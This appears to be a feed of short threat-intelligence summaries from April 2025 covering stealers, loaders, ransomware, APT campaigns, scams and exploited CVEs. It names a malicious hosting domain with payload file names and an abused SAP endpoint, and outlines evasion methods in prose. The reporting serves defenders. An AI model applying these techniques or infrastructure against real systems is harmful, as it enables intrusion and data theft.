Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams
released on 2025-04-29 @ 09:23:01 PM
This intelligence report analyzes common techniques, tactics, and procedures (TTPs) used by threat actors in investment scams, particularly focusing on the abuse of DNS mechanisms. The actors often use registered domain generation algorithms (RDGAs) to create large numbers of domains, embed similar web forms to collect user data, hide activity through traffic distribution systems (TDS), and leverage fake news with celebrity endorsements. The report details two specific actors, Reckless Rabbit and Ruthless Rabbit, examining their distinct RDGA patterns and campaign strategies. It highlights the importance of DNS in detecting and blocking these scams at scale, as actors exploit DNS to build and maintain their infrastructure.
MintsLoader Malware Analysis: Multi-Stage Loader Used in Cyber Attacks
released on 2025-04-29 @ 06:01:04 PM
MintsLoader, a malicious loader first observed in 2024, is employed in phishing and drive-by download campaigns to deploy payloads like GhostWeaver, StealC, and modified BOINC clients. It uses obfuscated JavaScript and PowerShell scripts in a multi-stage infection chain, featuring sandbox evasion techniques, a domain generation algorithm, and HTTP-based C2 communications. Various threat groups, including TAG-124 and SocGholish operators, utilize MintsLoader to target industrial, legal, and energy sectors. The loader's sophisticated obfuscation and evasion methods complicate detection, but Recorded Future's Malware Intelligence Hunting provides up-to-date information on new samples and C2 domains.
Outlaw cybergang attacking targets worldwide
released on 2025-04-29 @ 04:27:24 PM
A recent incident response case in Brazil revealed a Perl-based crypto mining botnet called Outlaw, also known as Dota, targeting Linux environments. The threat actor exploits weak SSH credentials, downloads malicious scripts, and deploys an XMRig miner for Monero cryptocurrency. The botnet includes an IRC-based client that acts as a backdoor, allowing for various malicious activities. Victims have been identified mainly in the United States, with additional targets in Germany, Italy, Thailand, Singapore, Taiwan, Canada, and Brazil. The article provides detailed analysis of the malware's components, persistence mechanisms, and evasion techniques. Recommendations for system administrators include hardening SSH configurations and implementing additional security measures to mitigate the risk of compromise.
Gremlin Stealer: New Stealer on Sale in Underground Forum
released on 2025-04-29 @ 04:27:12 PM
A new information-stealing malware called Gremlin Stealer, written in C#, has been identified by researchers. Advertised on Telegram since March 2025, it targets a wide range of data including browser information, crypto wallets, FTP and VPN credentials. The malware exfiltrates stolen data to a web server for publication. It can bypass Chrome's cookie V20 protection and supports various Chromium and Gecko-based browsers. Gremlin Stealer also targets cryptocurrency wallets, Telegram and Discord sessions, and system information. The stolen data is compressed into a ZIP archive and sent to the attacker's server using a Telegram bot. This evolving threat highlights the need for robust cybersecurity measures to protect against such information stealers.
Security Brief: French BEC Threat Actor Targets Property Payments
released on 2025-04-29 @ 08:43:48 AM
A new financially motivated business email compromise (BEC) threat actor, TA2900, has been identified targeting individuals in France and occasionally Canada. The actor sends French language emails using rental payment themes, claiming that rental installments have not been received and instructing recipients to send payments to new bank accounts. The campaigns use compromised mailboxes from educational institutions and often include PDF attachments with logos related to property management. The actor frequently changes the International Bank Account Numbers (IBAN) provided, using accounts from French banks. The messages may be generated with AI assistance and are designed to create anxiety and prompt immediate action from recipients.
Uyghur Diaspora Group Targeted with Remote Surveillance Malware
released on 2025-04-28 @ 05:09:58 PM
Senior members of the World Uyghur Congress (WUC) were targeted by a sophisticated spear phishing campaign aimed at deploying surveillance malware. The attack, discovered in March 2025, involved a trojanized version of a legitimate Uyghur language text editor. The malware enabled remote surveillance, collecting system information and allowing file manipulation. The campaign's infrastructure consisted of two distinct command-and-control clusters, with domains impersonating the legitimate tool's developer. While not technically advanced, the operation demonstrated a deep understanding of the Uyghur community and likely aligns with Chinese government interests. The targeting of exiled Uyghur representatives highlights the ongoing cyber threats faced by diaspora groups.
Decoding Fake US ESTA Emails: Scam or Real Deal?
released on 2025-04-28 @ 04:27:24 PM
An increase in malicious emails impersonating US Customs and Border Protection has been observed, targeting individuals with fake Electronic System for Travel Authorization (ESTA) applications. These well-crafted emails exploit uncertainty around immigration services, urging recipients to submit new applications. The scam involves a convincing replica of the ESTA portal, collecting personal and financial information. Victims are redirected to a payment gateway, charging $88 instead of the legitimate $21 fee. The scam risks identity theft, blackmail, and financial fraud. Users are advised to verify sender addresses, inspect URLs, and access the official ESTA website directly to avoid falling victim to this sophisticated phishing scheme.
Pick your Poison - A Double-Edged Email Attack
released on 2025-04-28 @ 04:27:21 PM
A sophisticated cyber-attack campaign has been identified, combining phishing techniques targeting Office365 credentials with malware delivery. The attackers use a file deletion reminder as a pretext, exploiting a legitimate file-sharing service to appear more credible. Upon opening a shared PDF file, users are presented with two hyperlinks: 'Preview' leads to a fake Microsoft login page for credential theft, while 'Download' initiates the installation of ConnectWise RAT malware. The malware establishes persistence through system services and registry modifications. This dual-threat approach emphasizes the need for user vigilance and education in recognizing phishing attempts and suspicious emails.
Smishing Attacks Rise: How to Spot and Stop SMS Phishing
released on 2025-04-28 @ 04:27:20 PM
SMS-based phishing attacks, known as smishing, are on the rise, targeting businesses with sophisticated social engineering tactics. These attacks often begin with urgent text messages containing disguised links, redirecting victims to fake login pages. Attackers exploit human emotions and create a false sense of security by using legitimate domains like Google as intermediaries. The process typically involves a deceptive SMS, followed by redirects to a phishing page impersonating trusted platforms like ServiceNow. Victims are then prompted to enter login credentials and fake multifactor authentication, potentially leading to unauthorized access and data breaches. The report emphasizes the importance of employee education and vigilance in recognizing and preventing these evolving threats.
Emerging Phishing Techniques: New Threats and Attack Vectors
released on 2025-04-28 @ 04:27:19 PM
This analysis delves into four sophisticated phishing techniques observed in 2025. These include embedding Base64-encoded JavaScript in SVG files, hiding malicious URLs in PDF annotations, using OneDrive links to deliver dynamic phishing content, and nesting MHT files within OpenXML documents. These methods successfully evaded email protections and reached intended victims, demonstrating the increasing sophistication of threat actors. The techniques exploit unconventional file formats, cloud-based platforms, and structural obfuscation to bypass traditional security measures. The findings emphasize the need for improved detection mechanisms, deeper inspection of file structures, and advanced context-aware parsing in email and document security tools.
DslogdRAT Malware Installed in Ivanti Connect Secure
released on 2025-04-28 @ 04:27:18 PM
The article discusses a malware called DslogdRAT, which was installed on Ivanti Connect Secure systems by exploiting CVE-2025-0282. The malware communicates with a C2 server during business hours to avoid detection. It uses a web shell for initial access and supports various commands for file operations, shell execution, and proxy functionality. The article details the malware's execution flow, configuration data, and communication method. Additionally, SPAWNSNARE malware was found on the same compromised systems. The attacks are potentially linked to the UNC5221 threat group, and organizations are advised to monitor for ongoing threats targeting Ivanti Connect Secure vulnerabilities.
New Critical Vulnerability Uncovered in SAP NetWeaver
released on 2025-04-28 @ 04:27:15 PM
A critical vulnerability in SAP NetWeaver Visual Composer, identified as CVE-2025-31324 with a severity score of 10, allows unauthorized file uploads and execution of malicious files. Initially suspected as a remote file inclusion issue, it was confirmed to be an unrestricted file upload vulnerability. Attackers exploited this vulnerability to upload JSP webshells, gaining remote control and executing arbitrary commands. The exploitation involved abusing the /developmentserver/metadatauploader endpoint. Attackers used sophisticated tools like Brute Ratel and the Heaven's Gate technique for command-and-control and evasion. SAP released a patch to address this vulnerability, which is strongly recommended to be applied immediately.
Weaponized Words: Uyghur Language Software Hijacked to Deliver Malware
released on 2025-04-28 @ 04:42:32 AM
This analysis details a spearphishing campaign targeting senior members of the World Uyghur Congress (WUC) in March 2025. The attackers used a trojanized version of a legitimate Uyghur language text editor to deliver Windows-based malware for remote surveillance. While not technically advanced, the malware delivery was well-customized to reach the Uyghur community. This incident is part of a broader pattern of digital transnational repression against the Uyghur diaspora by actors likely aligned with the Chinese government. The malware profiled systems, sent information to remote servers, and could load additional malicious plugins. The campaign demonstrates the ongoing digital threats facing exiled Uyghur communities and the exploitation of software meant to support marginalized cultures.
Navigating Through The Fog
released on 2025-04-28 @ 04:42:32 AM
An open directory linked to a Fog ransomware affiliate was discovered, containing tools for reconnaissance, exploitation, lateral movement, and persistence. Initial access was gained through compromised SonicWall VPN credentials, while other tools facilitated credential theft and exploitation of Active Directory vulnerabilities. Persistence was maintained via AnyDesk, automated by a PowerShell script. Sliver C2 executables were used for command-and-control operations. The victims spanned multiple industries across Europe, North America, and South America, highlighting the affiliate's broad targeting scope. The toolkit included SonicWall Scanner, DonPAPI, Certipy, Zer0dump, and Pachine/noPac for various attack stages.
HANNIBAL Stealer: A Rebranded Threat Born from Sharp and TX Lineage
released on 2025-04-26 @ 10:16:16 AM
The Hannibal Stealer is a sophisticated information-stealing malware, rebranded from Sharp and TX stealers. Developed in C#, it targets Chromium and Gecko-based browsers, extracting sensitive data while bypassing Chrome Cookie V20 protection. Its capabilities extend to cryptocurrency wallets, FTP clients, VPN credentials, and various system information. The malware includes a crypto clipper module and is controlled via a dedicated C2 panel. Sold on dark web forums, it employs geofencing, domain-matching, and comprehensive system profiling. The threat actor behind Hannibal Stealer has been linked to previous iterations, indicating minimal innovation beyond rebranding and updated communication methods. Active Telegram channels and control panels suggest ongoing operations and infrastructure maintenance.
The Return of Pharmacy-Themed Spam
released on 2025-04-26 @ 10:16:15 AM
Pharmaceutical-themed spam campaigns continue to target individuals and organizations, particularly in the healthcare and pharmaceutical sectors. Recent observations reveal a bulk spam campaign using spoofed identities and compromised infrastructure to send deceptive emails. The attackers employ tactics such as domain spoofing, DKIM signature manipulation, and the use of compromised servers running malicious PHP scripts. The emails contain links that redirect users to fraudulent websites posing as legitimate Canadian pharmacies, often including a fake security verification step. These campaigns aim to trick recipients into revealing sensitive information or potentially installing malware. The persistence of pharmacy-themed spam highlights the need for continued vigilance and awareness of common scam tactics.
Steganography Analysis With pngdump.py
released on 2025-04-26 @ 09:40:58 AM
This article discusses the analysis of a PNG file containing hidden malicious content using the pngdump.py tool. The image, 31744 pixels wide and 1 pixel high, was found to have a PE file embedded in its pixel data. The author demonstrates how to extract the hidden file using various Python tools and techniques, including slicing the raw pixel data to isolate the second channel where the malware was concealed. The extracted PE file, identified as a .NET executable, had 49 detections on VirusTotal, while the original PNG file had none, showcasing the effectiveness of this steganography technique in evading detection.
Fake GIF Leveraged in Multi-Stage Reverse-Proxy Card Skimming Attack
released on 2025-04-26 @ 03:26:48 AM
A sophisticated multi-stage carding attack on a Magento eCommerce website has been uncovered. The malware used a fake GIF image file, local browser sessionStorage data, and a malicious reverse-proxy server to steal credit card data, login details, cookies, and other sensitive information. The attack targeted an outdated Magento 1.9.2.4 installation, exploiting its lack of support and security vulnerabilities. The malware injected JavaScript code disguised as Bing tracking code and utilized a tampered payment file to create a user-specific attack. This advanced technique allowed the attackers to intercept and manipulate all website traffic while remaining undetected by victims and administrators.
The Persistent Threat of Salt Typhoon: Tracking Exposures of Potentially Targeted Devices
released on 2025-04-26 @ 01:52:01 AM
Salt Typhoon, a Chinese state-sponsored threat actor, has been targeting major telecommunications providers worldwide by exploiting vulnerabilities in network devices. This analysis tracks global exposures of internet-facing devices associated with Salt Typhoon activity over six months, including Sophos Firewalls, Cisco IOS XE WebUIs, Ivanti Connect Secure, and Fortinet FortiClient EMS systems. Overall combined exposure decreased by 25%, with Sophos Firewall interfaces showing the largest reduction. Cisco IOS XE was the only platform with increased exposure. Geographically, most exposures remain concentrated in the United States, except for Sophos XG Firewall exposures in Germany. The persistence of exposed devices raises questions about remediation efforts and organizational responses to these threats.
A new version of Triada spreads embedded in the firmware of Android devices
released on 2025-04-25 @ 04:43:23 PM
Kaspersky researchers have discovered a new version of the Triada Trojan being distributed through infected Android device firmware. The malware is embedded into system files before devices are sold, making it nearly impossible to remove. It infects the Zygote process to compromise all apps on the device. The Trojan's modular architecture allows attackers to deliver targeted payloads for stealing cryptocurrency, credentials, and other sensitive data from popular apps like WhatsApp, Facebook, and banking apps. It can also intercept SMS messages, make calls, and act as a reverse proxy. Over 4,500 infected devices have been detected worldwide, with the highest numbers in Russia, the UK, the Netherlands, Germany, and Brazil. The attackers have stolen over $264,000 in cryptocurrency so far.
Lessons from Ted Lasso for cybersecurity success
released on 2025-04-24 @ 11:27:55 PM
This article draws parallels between the popular TV show Ted Lasso and the cybersecurity industry, emphasizing the importance of intellectual curiosity in the field. The author, William Largent, discusses his approach to interviewing candidates for Talos, focusing on their innate curiosity rather than specific skillsets. The piece also covers recent cybersecurity news, including Cisco Talos' blog post on the initial access broker 'ToyMaker' and their custom backdoor 'LAGTOY'. Additionally, it highlights several security headlines, such as Apple's zero-day bug fixes and Microsoft's efforts to purge inactive Azure cloud tenants. The article concludes with information on upcoming events and prevalent malware files detected by Talos.
Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations
released on 2025-04-24 @ 06:01:57 PM
North Korean cybercrime activities heavily rely on Russian IP ranges in Khasan and Khabarovsk, utilizing extensive anonymization networks. The Void Dokkaebi group, linked to North Korea, employs fictitious companies like BlockNovas to target IT professionals through fraudulent job interviews, aiming to steal cryptocurrency and potentially engage in espionage. Their tactics involve using VPNs, proxies, and RDP connections to obscure their origins. Instruction videos suggest the involvement of less-skilled foreign conspirators. The primary focus remains cryptocurrency theft, but there's potential for expanded espionage activities and possible cooperation between North Korean and Russian entities.
Power Parasites: Job & Investment Scam Campaign Targets Energy Companies and Major Brands
released on 2025-04-24 @ 02:56:50 PM
A scam campaign dubbed 'Power Parasites' is targeting individuals in Asian countries through deceptive websites, social media groups, and Telegram channels. The campaign exploits the names and branding of global energy companies and other major brands to conduct job and investment scams. Victims are primarily located in Bangladesh, Nepal, and India. The operation uses over 150 domains, impersonating companies such as Siemens Energy, Schneider Electric, EDF Energy, Repsol S.A., and Suncor Energy. The scammers employ a combination of fake job offers and fraudulent investment platforms, often requesting personal and financial information from victims. The campaign remains active and continues to evolve, targeting additional prominent brands across various industries.
SnakeKeylogger – A Multistage Info Stealer Malware Campaign
released on 2025-04-24 @ 01:40:52 PM
This analysis explores a sophisticated malware campaign utilizing SnakeKeylogger, a credential-stealing threat. The attack begins with malicious spam emails containing disguised attachments. The infection chain involves multiple stages, including encrypted payload delivery, process hollowing, and stealthy execution. SnakeKeylogger targets various applications to harvest sensitive data, including web browsers, email clients, and FTP software. The malware employs advanced evasion techniques such as obfuscation and memory injection. It specifically targets Microsoft Outlook profiles and Wi-Fi credentials. The campaign demonstrates a structured approach with regular payload updates and abuse of legitimate servers for distribution. This threat poses significant risks for data theft and potential business email compromise.
Lazarus APT updates its toolset in watering hole attacks
released on 2025-04-24 @ 08:13:10 AM
The Lazarus group has launched a sophisticated attack campaign dubbed 'Operation SyncHole' targeting South Korean organizations. The operation combines watering hole attacks with exploitation of vulnerabilities in South Korean software. At least six organizations in the software, IT, financial, semiconductor manufacturing, and telecommunications industries were compromised. The attackers utilized updated versions of known Lazarus malware tools, including ThreatNeedle, wAgent, and COPPERHEDGE. They also exploited vulnerabilities in Cross EX and Innorix Agent software for initial access and lateral movement. The campaign demonstrates Lazarus' ongoing focus on supply chain attacks targeting South Korean entities and their deep understanding of the local software ecosystem.
Introducing ToyMaker
released on 2025-04-23 @ 10:13:00 PM
The initial access broker (IAB), whom Talos calls “ToyMaker” and assesses with medium confidence to be a financially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their custom-made backdoor, which we call “LAGTOY”, and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.
NFC Fraud Wave: Evolution of Ghost Tap on the Dark Web
released on 2025-04-23 @ 07:45:46 PM
Chinese cybercriminals are exploiting NFC technologies for fraudulent purposes, targeting financial institutions and consumers worldwide. They use sophisticated tools like Z-NFC and King NFC to facilitate illegal transactions at scale. The fraudsters leverage Host Card Emulation (HCE) to mimic physical NFC smart cards and create 'farms' of mobile devices to automate fraud. They target countries including the US, UK, EU, Australia, Canada, and others. The criminals also abuse NFC-enabled POS terminals and exploit loyalty points programs. This growing threat has led to significant financial losses and poses serious risks to payment security and digital identity systems globally.
New Stealer on the Horizon
released on 2025-04-23 @ 04:01:28 PM
SvcStealer 2025 is a novel information stealer delivered through spear phishing email attachments. It harvests sensitive data including machine information, installed software, user credentials, cryptocurrency wallets, and browser data. The malware creates a unique folder, terminates specific processes, and collects data from various sources. It compresses the gathered information, establishes a connection with a C2 server, and uploads the data. The malware can also capture screenshots and potentially download additional payloads. It employs evasion techniques by deleting traces and ensuring only one instance runs on the victim's machine. The threat actors behind SvcStealer could potentially act as initial access brokers, selling the gathered information on underground forums and criminal marketplaces.
Threat Infrastructure Uncovered Before Activation
released on 2025-04-22 @ 11:45:27 PM
Between November 2024 and April 2025, a set of domains and servers impersonating an Iraqi academic organization and fictitious UK tech firms were tracked. The infrastructure, while dormant, exhibited characteristics similar to APT34 (OilRig), including shared SSH keys, structured websites, and decoy HTTP behavior on M247-hosted servers. Key observations include the use of port 8080 for fake 404 responses, consistent SSH fingerprint reuse, and domains registered through P.D.R. Solutions with regway.com nameservers. The setup suggests deliberate pre-operational staging, offering defenders an early warning opportunity. Detection strategies include monitoring SSH fingerprints, HTTP response patterns, and domain registration behaviors.
Sophisticated backdoor mimicking secure networking software updates
released on 2025-04-22 @ 06:02:38 PM
A sophisticated backdoor targeting Russian organizations in government, finance, and industry sectors was discovered masquerading as updates for ViPNet secure networking software. The malware, distributed in LZH archives, exploits a path substitution technique to execute a malicious loader that deploys a versatile backdoor. This backdoor can connect to a C2 server, steal files, and launch additional malicious components. The attack highlights the increasing complexity of APT group tactics and emphasizes the need for multi-layered security defenses to protect against such sophisticated threats.
APT Group Profiles - Larva-24005
released on 2025-04-22 @ 04:40:57 PM
A new operation named Larva-24005, linked to the Kimsuky group, has been discovered by ASEC. The threat actors exploited RDP vulnerabilities to infiltrate systems, installing MySpy malware and RDPWrap for continuous remote access. They also deployed keyloggers to record user inputs. The group has been targeting South Korea's software, energy, and financial industries since October 2023, with attacks extending to multiple countries worldwide. Their methods include exploiting the BlueKeep vulnerability (CVE-2019-0708) and using phishing emails. The attackers employ various tools such as RDP scanners, droppers, and keyloggers in their multi-stage attack process.
Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin
released on 2025-04-22 @ 04:40:57 PM
A series of attacks targeting poorly managed MS-SQL servers has been identified, involving the installation of Ammyy Admin, a remote control tool. The attackers exploit vulnerable servers, execute commands to gather system information, and use WGet to install additional malware. The installed malware includes Ammyy Admin (mscorsvw.exe), its settings file (settings3.bin), and PetitPotato (p.ax). The attackers utilize an old version of Ammyy Admin (v3.10) and employ known exploitation methods to gain remote control. They also use PetitPotato for privilege escalation, adding new users and activating RDP services. To prevent such attacks, administrators are advised to use strong passwords, update software regularly, and implement security measures like firewalls.
DOGE Binary Loader Indicators of Compromise
released on 2025-04-22 @ 04:40:55 PM
This intelligence document provides a list of Indicators of Compromise (IoCs) associated with the DOGE Binary Loader. It includes several malicious URLs hosted on the domain 'hilarious-trifle-d9182e.netlify.app' along with their corresponding SHA-256 hashes. The listed files include PowerShell scripts ('lootsubmit.ps1' and 'trackerjacker.ps1'), a PNG image ('qrcode.png'), and an executable ('ktool.exe'). These IoCs are crucial for identifying and mitigating potential infections related to the DOGE Binary Loader malware campaign.
Infostealer Malware FormBook Spread via Phishing Campaign – Part I
released on 2025-04-22 @ 03:57:58 PM
A phishing campaign delivering a malicious Word document exploiting CVE-2017-11882 was observed spreading a new FormBook variant. The campaign tricks recipients into opening an attached document, which extracts a 64-bit DLL file and exploits the vulnerability to execute it. The DLL acts as a downloader and installer for FormBook, establishing persistence and downloading an encrypted payload disguised as a PNG file. The payload is decrypted and injected into a legitimate process using process hollowing techniques. This fileless variant of FormBook aims to evade detection by keeping the malware entirely in memory. The analysis covers the initial phishing email, exploitation process, payload download and decryption, and the sophisticated injection techniques used to deploy FormBook.
Sophisticated backdoor mimicking secure networking software updates
released on 2025-04-22 @ 03:57:50 PM
A sophisticated backdoor targeting Russian organizations in government, finance, and industrial sectors has been discovered. The malware masquerades as updates for ViPNet, a secure networking software suite. It is distributed via LZH archives containing legitimate and malicious files. The backdoor exploits a path substitution technique to execute a malicious loader, which then decrypts and loads a versatile payload capable of connecting to a C2 server, stealing files, and launching additional malicious components. The complexity of this attack highlights the need for multi-layered security measures to protect against advanced persistent threats.
PE32 Ransomware: A New Telegram-Based Threat on the Rise
released on 2025-04-22 @ 03:57:49 PM
PE32 Ransomware is a new strain of malware that utilizes Telegram for command and control. Despite its amateur execution, it effectively encrypts files and causes significant damage. The ransomware features a unique two-tiered payment model, demanding one fee to unlock files and another to prevent data leaks. It communicates entirely via Telegram Bot API, with the bot token exposed in the code. PE32 is characterized by its messy and loud behavior, dropping marker files, triggering disk repairs, and encrypting even useless files. While lacking sophisticated evasion techniques, it poses a real threat due to its fast encryption process and the current state of poor security hygiene among potential victims. The malware's reliance on basic Windows libraries and its chaotic codebase make it both easy to analyze and potentially dangerous.
Detecting Multi-Stage Infection Chains Madness
released on 2025-04-22 @ 09:41:29 AM
This analysis examines a complex multi-stage attack that has relied, since February 2024, on a resilient network infrastructure described as 'Cloudflare tunnel infrastructure to deliver multiple RATs'. The infection chain involves multiple steps, including phishing emails with malicious attachments, execution of various file types (LNK, HTA, BAT, Python scripts), and eventual delivery of AsyncRAT. The attackers employ various evasion techniques and leverage public services like TryCloudflare and DynDNS. The report highlights the importance of combining cyber threat intelligence with detection rules to enhance security capabilities against evolving threats. It also provides detailed information on the attack stages, detection opportunities, and associated indicators of compromise.
How Lumma Stealer sneaks into organizations
released on 2025-04-21 @ 05:31:35 PM
Lumma Stealer, a sophisticated information-stealing malware, has gained prominence in cybercriminal circles since 2022. It employs various distribution methods, with fake CAPTCHA pages being a notable vector. These pages mimic legitimate services and trick users into executing malicious commands. The malware uses complex infection chains involving PowerShell scripts, JavaScript, and AutoIt components to evade detection. Once installed, Lumma Stealer targets a wide range of sensitive data, including cryptocurrency wallets, browser credentials, and financial information. The malware's stealthy execution and anti-analysis techniques make it a significant threat to both individuals and organizations.
It's 2025... so why are obviously malicious advertising URLs still going strong?
released on 2025-04-21 @ 11:49:36 AM
In 2025, a phishing email containing a malicious link redirected through Google Ads was received by the Internet Storm Center. The link led to a credential-stealing page hosted on a dynamic DNS service. Despite being clearly fraudulent and detected by VirusTotal, the ad redirect remained active for over a week. The article questions why major ad providers like Google aren't implementing basic security measures to prevent such obvious threats. It suggests that ad companies should filter out links to domains unsuitable for legitimate ads and regularly check landing pages for malicious content. The author argues that this should be the minimum expected from ad providers in 2025, especially given the availability of AI and tools like VirusTotal for threat detection.
The "free money" trap: How scammers exploit financial anxiety
released on 2025-04-18 @ 10:01:02 PM
This analysis explores how scammers capitalize on financial stress by promising 'free money' through fake subsidy programs, government grants, or relief cards. Common tactics include using urgency, exclusivity, and fabricated social proof to manipulate victims. Scammers employ various techniques such as phishing, impersonation, fake customer support, QR code scams, and malware-laden attachments to collect personal data for identity theft or future scams. The article provides red flags to watch for, including vague claims, lack of contact information, and unrealistic promises. To protect against these scams, individuals should verify sources, avoid sharing personal information on unverified websites, report suspicious sites, and educate others about these fraudulent schemes.
Two sides of the same coin
released on 2025-04-18 @ 09:45:38 PM
This intelligence report analyzes the similarities between two previously separate APT groups, Team46 and TaxOff, concluding they are likely the same entity. The analysis covers their shared tactics, techniques, and procedures, including similar PowerShell commands, loader functionality, and infrastructure patterns. Key findings include the use of zero-day exploits, complex malware development, and long-term persistence strategies. The report details the groups' use of multi-layered encryption in their loaders, custom obfuscation techniques, and various malware tools like Trinper backdoor and Cobalt Strike. The combined group, now referred to as Team46, demonstrates sophisticated capabilities in targeted attacks against protected infrastructures.
SuperCard X: exposing a Chinese-speaker MaaS for NFC Relay fraud operation
released on 2025-04-18 @ 04:07:52 PM
A new Android malware campaign called 'SuperCard X' has been identified, employing NFC-relay techniques to enable fraudulent POS payments and ATM withdrawals. Distributed through a Chinese-speaking Malware-as-a-Service platform, it shares similarities with NGate malware. The campaign uses social engineering tactics to trick victims into installing the malicious app and tapping their payment cards on infected phones. This sophisticated fraud scheme combines SMS phishing, phone calls, malware installation, and NFC data interception. SuperCard X poses a significant financial risk to banking institutions, payment providers, and credit card issuers due to its ability to perform instant fraudulent cash-outs with debit and credit cards.
Proton66: Compromised WordPress Pages and Malware Campaigns
released on 2025-04-18 @ 08:11:59 AM
This intelligence briefing focuses on malware campaigns linked to Proton66, particularly those targeting Android devices through compromised WordPress websites. It details how these sites were injected with malicious scripts to redirect Android users to fake Google Play Store pages. The report also covers the XWorm campaign targeting Korean-speaking users, the Strela Stealer targeting German-speaking countries, and the WeaXor ransomware. The analysis provides insights into the infection chains, malware configurations, and command-and-control servers used in these campaigns. Additionally, it offers recommendations for blocking associated IP ranges and lists numerous indicators of compromise (IOCs) for each campaign.
Roundup: Care what you share
released on 2025-04-17 @ 11:49:12 PM
This report discusses the importance of being mindful of the information shared online, particularly when using search engines and AI-powered tools. It highlights the risks associated with sharing personal data and preferences, which can be stored and used for advertising or other purposes. The author recommends using privacy-focused search engines like SearXNG and cautions against oversharing with AI language models. The report also touches on ransomware trends, emphasizing the need for basic cyber hygiene practices like software updates and credential protection. Additionally, it covers recent security headlines, including concerns about OpenAI's reduced safety testing and the potential risks of AI-hallucinated code dependencies.
KeyPlug-Linked Server Exposes Fortinet Exploits & Webshell Activity Targeting a Major Japanese Company
released on 2025-04-17 @ 09:19:59 PM
A server linked to KeyPlug malware briefly exposed tooling used in active operations. The infrastructure, live for less than a day, revealed Fortinet firewall and VPN exploit scripts, a PHP webshell, and network reconnaissance tools targeting authentication and internal portals of a major Japanese company. The exposed directory provided insight into the attacker's workflow, from infrastructure reconnaissance to post-access session management. Notable files included Fortinet reconnaissance scripts, CDN fingerprinting tools, and encrypted command execution utilities. The server's brief exposure offers a rare glimpse into the operational staging and planning of a likely advanced adversary.
Malicious HWP Document Disguised as Reunification Education Support Application
released on 2025-04-17 @ 04:34:30 PM
A deceptive HWP document, masquerading as a reunification education support application, was discovered on March 5. The document, when opened, creates multiple files in the TEMP folder, including a malicious BAT file. This BAT file executes various actions to ensure persistent malware operation, including registering task schedulers and executing additional malicious files. The malware ultimately accesses an external URL to download and execute additional files, allowing threat actors to execute various commands. This incident is part of a recent trend of malware distribution using HWP documents, with attacks now targeting the general public rather than specific users. Users are advised to be cautious and keep their security software updated.
Downloader Malware Written in JPHP Interpreter
released on 2025-04-17 @ 04:34:28 PM
A newly discovered malware utilizes JPHP, a PHP interpreter running on Java Virtual Machine, to create a downloader. The malware is distributed in a ZIP file containing Java Runtime Environment and libraries, enabling execution without a separate Java environment. It communicates with a C2 server, disables Windows Defender's behavior monitoring, and uses Telegram for additional C2 connections. The malware can download and execute additional payloads, potentially including data breach-type malware like Strrat and Danabot. This case highlights how threat actors exploit lesser-known technologies like JPHP for malware distribution, emphasizing the importance of scrutinizing executable files and scripts from various sources.
Around the World in 90 Days: State-Sponsored Actors Try ClickFix
released on 2025-04-17 @ 02:57:02 PM
Multiple state-sponsored threat actors from North Korea, Iran, and Russia have been observed adopting the ClickFix social engineering technique, previously associated with cybercriminal activities. Over a three-month period from late 2024 to early 2025, groups such as TA427, TA450, UNK_RemoteRogue, and TA422 incorporated ClickFix into their existing infection chains. The technique involves using dialogue boxes with instructions for targets to copy, paste, and run malicious commands on their machines. While the adoption of ClickFix hasn't revolutionized these groups' campaigns, it has replaced installation and execution stages in their existing processes. This trend highlights the fluidity of tactics among threat actors and the potential for wider adoption of ClickFix by other state-sponsored groups in the future.
New version of MysterySnail RAT and lightweight MysteryMonoSnail backdoor
released on 2025-04-17 @ 01:06:25 PM
A new version of the MysterySnail RAT, attributed to the Chinese-speaking IronHusky APT group, has been detected targeting government organizations in Mongolia and Russia. The malware, which hadn't been publicly reported since 2021, now features a modular architecture with five additional DLL modules for command execution. A lightweight version dubbed MysteryMonoSnail was also observed. The infection chain involves a malicious MMC script, an intermediary backdoor, and the main MysterySnail RAT payload. The attackers use public file storage and the piping-server project for command and control. This case highlights the importance of maintaining vigilance against seemingly obsolete malware families, as they may continue operating undetected for extended periods.
Unmasking the new XorDDoS controller and infrastructure
released on 2025-04-17 @ 01:06:23 PM
The XorDDoS trojan, a DDoS malware targeting Linux machines, continues to spread globally with over 70% of attacks targeting the United States from Nov 2023 to Feb 2025. The operators are believed to be Chinese-speaking individuals based on language settings. A new 'VIP version' of the XorDDoS controller and central controller have been discovered, enabling more sophisticated and widespread attacks. The malware uses SSH brute-force attacks to gain access and implements persistence mechanisms. A new central controller allows threat actors to manage multiple sub-controllers simultaneously, enhancing attack coordination. The infection chain, decryption methods, and network communication patterns between the trojan, sub-controller, and central controller are analyzed in detail.
CVE-2025-24054, NTLM Exploit in the Wild
released on 2025-04-16 @ 10:53:49 PM
A critical vulnerability, CVE-2025-24054, related to NTLM hash disclosure via spoofing, has been actively exploited since March 19, 2025. The flaw allows attackers to leak NTLM hashes or user passwords using a maliciously crafted .library-ms file, potentially compromising systems. A campaign targeting government and private institutions in Poland and Romania used malspam to distribute Dropbox links containing archives exploiting this vulnerability. The exploit can be triggered with minimal user interaction, such as right-clicking or navigating to the folder containing the malicious file. This vulnerability appears to be a variant of the previously patched CVE-2024-43451, sharing several similarities.
Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis
released on 2025-04-16 @ 10:53:48 PM
A multi-layered attack chain was uncovered in December 2024, employing distinct stages to deliver malware like Agent Tesla variants, Remcos RAT, or XLoader. The campaign uses phishing emails posing as order release requests with malicious attachments. The attack chain leverages multiple execution paths, including .NET and AutoIt compiled executables, to evade detection and complicate analysis. The final payload is typically an Agent Tesla variant, a well-known infostealer. This approach demonstrates how attackers are increasingly relying on complex delivery mechanisms to bypass traditional sandboxes and ensure successful payload execution. Despite the multi-layered approach, Advanced WildFire effectively detects each stage, providing better protection for customers.
Latest Mustang Panda Arsenal: Toneshell, StarProxy, PAKLOG, CorKLOG, and SplatCloak
released on 2025-04-16 @ 08:35:24 PM
